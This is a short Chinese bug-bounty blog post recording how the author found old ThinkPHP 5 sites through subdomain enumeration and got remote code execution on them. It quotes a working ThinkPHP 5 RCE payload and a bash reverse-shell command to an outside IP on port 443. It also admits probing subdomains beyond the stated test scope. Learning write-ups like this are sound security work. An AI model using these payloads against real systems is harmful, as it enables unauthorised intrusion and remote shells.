闲来无事，盒子上申请了下项目，发现二个thinkPHP的站，版本还都挺老，记录一下反弹shell的过程

盒子项目申请一过，准时准点往前冲，发现测试范围只有一个子域名，稍微过了一下，前排明显的漏洞应该大佬们都提完了，就想着大佬们往前冲，我就另辟蹊径看看能不能通过其他子域进到测试范围。

惯例先干子域名，用oneforall跑了下子域名，大概几十个，然后用goby过了一下子域的资产，发现有二个站用的是老版本的thinkPHP

心里的想法就开始躁动不安了，那可得好好干一下，tp5的洞第一次挖，也顺带记录学习一下，往后备用。

中间参考的文章：https://www.freebuf.com/column/230787.html

中间xray给出的exp：

_method=__construct&filter[]=system&get[]=whoami&method=get

反弹shell这里有个不大不小的坑，可能就是我太菜了，没有想到是需要url编码，所以没反弹成功

Poc：bash -i >& /dev/tcp/10.10.10.11/443 0>&1（反弹需要url编码）

反弹成功截图

千里之行，始于足下，点滴积累，终将汇聚成河流，纯属小白记录一下挖洞的踩坑过程。

使用到tp5检测工具：https://github.com/sukabuliet/ThinkphpRCE

• thinkphp
• tp5
• tp漏洞检测